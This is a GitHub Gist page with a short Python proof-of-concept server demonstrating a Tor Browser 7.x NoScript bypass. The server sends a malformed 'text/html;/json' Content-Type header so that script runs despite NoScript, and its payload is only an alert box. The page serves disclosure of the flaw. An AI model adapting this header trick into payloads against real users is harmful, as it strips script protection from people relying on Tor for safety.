/TorBrowser_7.x_NoScript_bypass.py
Last active Oct 10, 2018
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
| #!/usr/bin/python | |
| from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer | |
| PORT_NUMBER = 31337 | |
| class myHandler(BaseHTTPRequestHandler): | |
| #Handler for the GET requests | |
| def do_GET(self): | |
| self.send_response(200) | |
| self.send_header('Content-type','text/html;/json') # Here is where the magic happens | |
| self.end_headers() | |
| self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>") | |
| return | |
| try: | |
| server = HTTPServer(('', PORT_NUMBER), myHandler) | |
| print 'Started httpserver on port ' , PORT_NUMBER | |
| server.serve_forever() | |
| except KeyboardInterrupt: | |
| print '^C received, shutting down the web server' | |
| server.socket.close() |
This comment has been minimized.
This comment has been minimized.
brammittendorff
commented
Sep 10, 2018
|
Python3 version: |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
sparskakyl commentedSep 10, 2018
2 hacky wacky 4 me